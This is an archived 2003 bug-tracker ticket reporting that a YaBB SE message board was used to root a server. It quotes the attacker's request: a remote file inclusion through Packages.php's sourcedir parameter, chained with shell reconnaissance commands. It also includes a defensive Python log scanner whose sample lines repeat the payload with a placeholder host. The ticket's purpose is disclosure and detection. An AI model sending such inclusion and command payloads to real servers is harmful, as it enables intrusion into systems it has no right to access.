#12 BIG BUG in packages.php

closed-rejected
nobody
9
2003-02-01
2003-01-31
RGIS
No

A hacker was able to install a rootkit on our server
through a YaBB messageboard:

He used the following string to start taking control:

/yabbse/Sources/Packages.php?sourcedir=http://www.domainofthehacker.com&cmd=cat%20/etc/*-rel*;uname%20-a;id;w;ls%20-la%20/usr/bin/sudo HTTP/1.1" 200 595

We find it, as fellow PHP developers, quite strange that
you do not check the variables and strip illegal
characters like ";", ":", "%", "@" from them.

Please change this and notify us when you have. With
the illegal characters stripped, the above would not have
had any result, and we would not have hundreds of
euros in damage.

To all Linux webhosters: please check your servers for a
YaBB messageboard and make sure it is safe to keep
it, and that hackers cannot abuse it to gain control over your
server.

Webmanager
RGIS
info@rgis.nl
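
The access-log line quoted in the report is the kind of evidence a host operator can search for. The following is an added example, not code from the ticket or from YaBB: a small Python scanner that parses NCSA/Apache-style access-log lines and flags any query parameter whose value is an absolute URL (the remote-include pattern above) or a `../` sequence, recording whether the request was served (2xx status). The log lines, addresses and the `attacker.example` host are constructed.

```python
import re
from urllib.parse import unquote_plus

# Request part of an NCSA/Apache-style access-log line (constructed pattern).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) \S+'
)
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)  # value is an absolute URL
TRAVERSAL = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')         # value climbs directories

# Constructed sample: line 1 mirrors the request quoted in the report with a
# placeholder host; line 2 is a normal board request; line 3 is a traversal
# attempt that the server rejected with 404.
SAMPLE_LOG = """\
10.0.0.5 - - [31/Jan/2003:10:15:32 +0100] "GET /yabbse/Sources/Packages.php?sourcedir=http://attacker.example&cmd=cat%20/etc/*-rel*;uname%20-a;id HTTP/1.1" 200 595 "-" "Mozilla/4.0"
10.0.0.7 - - [31/Jan/2003:10:16:01 +0100] "GET /yabbse/index.php?board=3;action=display;threadid=42 HTTP/1.1" 200 8120 "-" "Mozilla/4.0"
10.0.0.9 - - [31/Jan/2003:10:16:40 +0100] "GET /yabbse/Sources/Packages.php?sourcedir=../../etc HTTP/1.1" 404 310 "-" "curl/7.9"
"""

def parse_query(query):
    """Split on '&' only (a ';' inside a value survives) and percent-decode both sides."""
    pairs = []
    for item in query.split('&'):
        if item:
            name, _, value = item.partition('=')
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs

def analyze_line(line):
    """Return a list of findings for one log line; [] when nothing looks suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return []  # not a request line we understand; a real scanner would count these
    path, _, query = m.group('target').partition('?')
    served = m.group('status').startswith('2')  # 2xx means the include request got a response
    findings = []
    for name, value in parse_query(query):
        if REMOTE_URL.match(value):
            kind = 'remote_include'
        elif TRAVERSAL.search(value):
            kind = 'path_traversal'
        else:
            continue
        findings.append({'ip': m.group('ip'), 'path': path, 'param': name,
                         'kind': kind, 'value': value, 'served': served})
    return findings

def scan_log(text):
    """Run analyze_line over every line of an access log and collect the findings."""
    return [f for line in text.splitlines() for f in analyze_line(line)]
```

Running `scan_log(SAMPLE_LOG)` reports the served remote include in `sourcedir` on the first line and the rejected traversal on the third; the ordinary board request produces nothing.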

Discussion

  • RGIS
    RGIS
    2003-01-31

    • priority: 5 --> 9
     
  • Corey Chapman
    Corey Chapman
    2003-02-01

    • status: open --> closed-rejected